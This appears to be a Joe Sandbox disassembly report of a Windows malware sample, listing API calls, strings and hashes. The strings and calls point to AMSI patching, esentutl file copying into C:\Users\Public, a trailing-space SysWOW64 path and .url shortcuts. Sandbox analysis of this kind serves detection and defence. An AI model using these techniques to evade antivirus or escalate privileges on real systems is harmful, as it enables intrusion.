                                                                        • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                        • API String ID: 297057983-2644593349
                                                                        • Opcode ID: a06c1bdc9565208b40314a18d87203dc1182fb8ccd81a994a8c35a857f2b01b3
                                                                        • Instruction ID: 90e7e3932ac7e1336817d76a9199ac9c41d660e94547dbe6a879250400d4bfca
                                                                        • Opcode Fuzzy Hash: a06c1bdc9565208b40314a18d87203dc1182fb8ccd81a994a8c35a857f2b01b3
                                                                        • Instruction Fuzzy Hash: A2140934A0416D8BDB24EF64DC81ADE73FAEF85304F5041E6A409AB214DA30EED5EF59
                                                                        APIs
                                                                          • Part of subcall function 02C689D0: FreeLibrary.KERNEL32(74CD0000,00000000,00000000,00000000,00000000,02CD738C,Function_0000662C,00000004,02CD739C,02CD738C,05F5E103,00000040,02CD73A0,74CD0000,00000000,00000000), ref: 02C68AAA
                                                                          • Part of subcall function 02C6DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02C6DD5E), ref: 02C6DCCB
                                                                          • Part of subcall function 02C6DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C6DD05
                                                                          • Part of subcall function 02C6DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02C6DD32
                                                                          • Part of subcall function 02C6DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02C6DD3B
                                                                        • Sleep.KERNEL32(000003E8,ScanBuffer,02CD7380,02C7B7B8,UacScan,02CD7380,02C7B7B8,ScanString,02CD7380,02C7B7B8,02C7BB30,00000000,00000000,02C7BB24,00000000,00000000), ref: 02C740CB
                                                                          • Part of subcall function 02C688B8: LoadLibraryW.KERNEL32(amsi), ref: 02C688C1
                                                                          • Part of subcall function 02C688B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02C68920
                                                                        • Sleep.KERNEL32(000003E8,ScanBuffer,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,UacScan,02CD7380,02C7B7B8,000003E8,ScanBuffer,02CD7380,02C7B7B8,UacScan,02CD7380), ref: 02C74277
                                                                          • Part of subcall function 02C6894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02CD73A8,02C6A587,ScanString,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,Initialize,02CD73A8,02C6A93C,UacScan), ref: 02C68960
                                                                          • Part of subcall function 02C6894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02C6897A
                                                                          • Part of subcall function 02C6894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02CD73A8,02C6A587,ScanString,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,Initialize), ref: 02C689B6
                                                                        • Sleep.KERNEL32(00004E20,UacScan,02CD7380,02C7B7B8,ScanString,02CD7380,02C7B7B8,ScanBuffer,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,UacInitialize,02CD7380,02C7B7B8), ref: 02C750EE
                                                                          • Part of subcall function 02C6DC04: RtlI.N(?,?,00000000,02C6DC7E), ref: 02C6DC2C
                                                                          • Part of subcall function 02C6DC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02C6DC7E), ref: 02C6DC42
                                                                          • Part of subcall function 02C6DC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02C6DC7E), ref: 02C6DC61
                                                                          • Part of subcall function 02C57E5C: GetFileAttributesA.KERNEL32(00000000,?,02C7041F,ScanString,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,ScanString,02CD7380,02C7B7B8,UacScan,02CD7380,02C7B7B8,UacInitialize), ref: 02C57E67
                                                                          • Part of subcall function 02C685BC: WinExec.KERNEL32(?,?), ref: 02C68624
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                        • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                        • API String ID: 2171786310-3926298568
                                                                        • Opcode ID: 234a0b1b4706391987c8a9a9c9ddccf9e09db041483e34902e4f92b4567b25a2
                                                                        • Instruction ID: 698e558c3ff4d7f36dd078349d41a1acc4a719b7b18389645be0e6707da74c36
                                                                        • Opcode Fuzzy Hash: 234a0b1b4706391987c8a9a9c9ddccf9e09db041483e34902e4f92b4567b25a2
                                                                        • Instruction Fuzzy Hash: 4E43E734B0416E8BDB24EF64DC81B9A73BAEF85304F1041E69409AB614DE30EED5EF59

                                                                        Control-flow Graph
                                                                        APIs
                                                                          • Part of subcall function 02C689D0: FreeLibrary.KERNEL32(74CD0000,00000000,00000000,00000000,00000000,02CD738C,Function_0000662C,00000004,02CD739C,02CD738C,05F5E103,00000040,02CD73A0,74CD0000,00000000,00000000), ref: 02C68AAA
                                                                          • Part of subcall function 02C68788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02C68814
                                                                          • Part of subcall function 02C6894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02CD73A8,02C6A587,ScanString,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,Initialize,02CD73A8,02C6A93C,UacScan), ref: 02C68960
                                                                          • Part of subcall function 02C6894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02C6897A
                                                                          • Part of subcall function 02C6894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02CD73A8,02C6A587,ScanString,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,Initialize), ref: 02C689B6
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02CD7380,02C6EF4C,OpenSession,02CD7380,02C6EF4C,UacScan,02CD7380,02C6EF4C,ScanBuffer,02CD7380,02C6EF4C,OpenSession,02CD7380), ref: 02C6ED6E
                                                                        • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02CD7380,02C6EF4C,OpenSession,02CD7380,02C6EF4C,UacScan,02CD7380,02C6EF4C,ScanBuffer,02CD7380,02C6EF4C,OpenSession), ref: 02C6ED76
                                                                        • CloseHandle.KERNEL32(000005EC,00000000,00000000,000000FF,ScanString,02CD7380,02C6EF4C,OpenSession,02CD7380,02C6EF4C,UacScan,02CD7380,02C6EF4C,ScanBuffer,02CD7380,02C6EF4C), ref: 02C6ED7F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                        • String ID: )"C:\Users\Public\Libraries\hizbeleS.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                        • API String ID: 3475578485-3434883246
                                                                        • Opcode ID: 229f982e61229e359d215edc10182479f6641dc2fec13c4f5fd9517270522324
                                                                        • Instruction ID: 5341e4ad60fc1f4ac3e8cc5beaf48a7425ab19a425d8de3bbedace3e435ab41d
                                                                        • Opcode Fuzzy Hash: 229f982e61229e359d215edc10182479f6641dc2fec13c4f5fd9517270522324
                                                                        • Instruction Fuzzy Hash: CC22CF34A001699FEB24FF64D885F9E73BAEF85300F5041A2A405AB254DB31DEC5EF5A

                                                                        Control-flow Graph
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000), ref: 02C517D0
                                                                        • Sleep.KERNEL32(0000000A,00000000), ref: 02C517E6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 7f31004f8a671ebf3f35389ce4a804b6b24c79054419bd1ef1f2e1bb4eb6d553
                                                                        • Instruction ID: f377a0c4be0126c49c9fd38943dbfc89c67a22f6ea2a2b81664e15aef480cda9
                                                                        • Opcode Fuzzy Hash: 7f31004f8a671ebf3f35389ce4a804b6b24c79054419bd1ef1f2e1bb4eb6d553
                                                                        • Instruction Fuzzy Hash: 1EB12672A012618FC729CF28D8C8356BBE1EB85315F1E876AD94DCB385C7B0D591CB98

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • LoadLibraryW.KERNEL32(amsi), ref: 02C688C1
                                                                          • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
                                                                          • Part of subcall function 02C67D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C67DEC
                                                                        • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02C68920
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                        • String ID: DllGetClassObject$W$amsi
                                                                        • API String ID: 941070894-2671292670
                                                                        • Opcode ID: 0d8cd97056d448df93180465374a3d3fe389bd273c380d3eca965daf917d55b7
                                                                        • Instruction ID: 925f7bca769ec3d601750f869da8e0c97bc2ae2eda3ff6d15e831e76d19e8ce0
                                                                        • Opcode Fuzzy Hash: 0d8cd97056d448df93180465374a3d3fe389bd273c380d3eca965daf917d55b7
                                                                        • Instruction Fuzzy Hash: 4EF0AF5044C381BAE300E2748C89F5BBECE4B62264F448F18F2E89A2D2D679D1089B77

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000,?,?,00000000,02C51FE4), ref: 02C51B17
                                                                        • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02C51FE4), ref: 02C51B31
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 94240fb08379f8151650cc9323b30bd183d2878b131720e249cadc6bb782ef8f
                                                                        • Instruction ID: f42c1c4c519e37bdca94d8cce8e70b9d410156caec3178f3f15be2b7647dc6cc
                                                                        • Opcode Fuzzy Hash: 94240fb08379f8151650cc9323b30bd183d2878b131720e249cadc6bb782ef8f
                                                                        • Instruction Fuzzy Hash: 0A51E4716412608FD725CF68C988756BBD0AF85314F1C86AEDD4CCB282D7F0D985CB99

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C6E5F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: CheckConnectionInternet
                                                                        • String ID: Initialize$OpenSession$ScanBuffer
                                                                        • API String ID: 3847983778-3852638603
                                                                        • Opcode ID: 9329c3f13980c85b7a8b36c7136d23423244337fe40d42d9052ccfc5c518e177
                                                                        • Instruction ID: 4003dbb6fc28eed4bdf43764a7e5e134dd27b835d46db3e563e2b070e2e79fea
                                                                        • Opcode Fuzzy Hash: 9329c3f13980c85b7a8b36c7136d23423244337fe40d42d9052ccfc5c518e177
                                                                        • Instruction Fuzzy Hash: 1A410B35A0011C9BEB24EFA4D881EEEB3FAEF88700F104422E441E7250DA74ED81EF59

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C6823C,?,?,00000000,?,02C67A7E,ntdll,00000000,00000000,02C67AC3,?,?,00000000), ref: 02C6820A
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNELBASE(?), ref: 02C6821E
                                                                          • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
                                                                        • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02C68814
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                        • String ID: CreateProcessAsUserW$Kernel32
                                                                        • API String ID: 3130163322-2353454454
                                                                        • Opcode ID: e903cfcfb33dc734b8ef484bad905fe2ae1e1ba2c469aa8aa3441643c5f077d9
                                                                        • Instruction ID: 2ea7519e22cb6d93a578598fd4c6dae70514cd6a31fb029bef8d7ba16bba1190
                                                                        • Opcode Fuzzy Hash: e903cfcfb33dc734b8ef484bad905fe2ae1e1ba2c469aa8aa3441643c5f077d9
                                                                        • Instruction Fuzzy Hash: C611F3B2640248BFEB50EFACDC85FAA77EDEB0C700F514520BA08E3200C634ED549B68
                                                                        APIs
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C6823C,?,?,00000000,?,02C67A7E,ntdll,00000000,00000000,02C67AC3,?,?,00000000), ref: 02C6820A
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNELBASE(?), ref: 02C6821E
                                                                          • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
                                                                        • WinExec.KERNEL32(?,?), ref: 02C68624
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule$AddressProc$Exec
                                                                        • String ID: Kernel32$WinExec
                                                                        • API String ID: 2292790416-3609268280
                                                                        • Opcode ID: 6fcde1bdeda4c8e15ce3be0fc9a348943df16c977eba0e81eb88a41848371aca
                                                                        • Instruction ID: 141f2440eedc5f9ae7755a9afc1b1e3176835723935b262a5f866250628396d9
                                                                        • Opcode Fuzzy Hash: 6fcde1bdeda4c8e15ce3be0fc9a348943df16c977eba0e81eb88a41848371aca
                                                                        • Instruction Fuzzy Hash: 2201A470684304BFEB14EFA4DC45F6E77EDEB08700F904520B904D2640D674ED589A29
                                                                        APIs
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C6823C,?,?,00000000,?,02C67A7E,ntdll,00000000,00000000,02C67AC3,?,?,00000000), ref: 02C6820A
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNELBASE(?), ref: 02C6821E
                                                                          • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
                                                                        • WinExec.KERNEL32(?,?), ref: 02C68624
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule$AddressProc$Exec
                                                                        • String ID: Kernel32$WinExec
                                                                        • API String ID: 2292790416-3609268280
                                                                        • Opcode ID: 5ceefb7c5e08352fb3d15b21974d962e5a83e47da42f19e483ca3f062992eead
                                                                        • Instruction ID: 2900b50a91360e9a35af250778bcc9d34ecd05a88b4c0cc0a86415307fc2f273
                                                                        • Opcode Fuzzy Hash: 5ceefb7c5e08352fb3d15b21974d962e5a83e47da42f19e483ca3f062992eead
                                                                        • Instruction Fuzzy Hash: ABF0A470684304BFEB14EFA4DC45F6E77ADEB08700F904520B904D2640D674ED589A29
                                                                        APIs
                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02C65D74,?,?,02C63900,00000001), ref: 02C65C88
                                                                        • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02C65D74,?,?,02C63900,00000001), ref: 02C65CB6
                                                                          • Part of subcall function 02C57D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02C63900,02C65CF6,00000000,02C65D74,?,?,02C63900), ref: 02C57DAA
                                                                          • Part of subcall function 02C57F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02C63900,02C65D11,00000000,02C65D74,?,?,02C63900,00000001), ref: 02C57FB7
                                                                        • GetLastError.KERNEL32(00000000,02C65D74,?,?,02C63900,00000001), ref: 02C65D1B
                                                                          • Part of subcall function 02C5A778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02C5C3D9,00000000,02C5C433), ref: 02C5A797
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                        • String ID:
                                                                        • API String ID: 503785936-0
                                                                        • Opcode ID: 2f656bb3870a3c4f974231b51c026d8edf26ec9c01090f8d139820b39b43e22e
                                                                        • Instruction ID: 501d24d6584bf22581f14c46b49cfc2c90e3093e9a2a25280b1e38d5f3fe8cef
                                                                        • Opcode Fuzzy Hash: 2f656bb3870a3c4f974231b51c026d8edf26ec9c01090f8d139820b39b43e22e
                                                                        • Instruction Fuzzy Hash: 8031D770E006599FDB00EFA4C9857EDBBF6AF48700F904165E904AB380D7759E84DFA5
                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,00000000,02DCBA58), ref: 02C6F258
                                                                        • RegSetValueExA.ADVAPI32(00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02C6F2C3), ref: 02C6F290
                                                                        • RegCloseKey.ADVAPI32(00000888,00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02C6F2C3), ref: 02C6F29B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
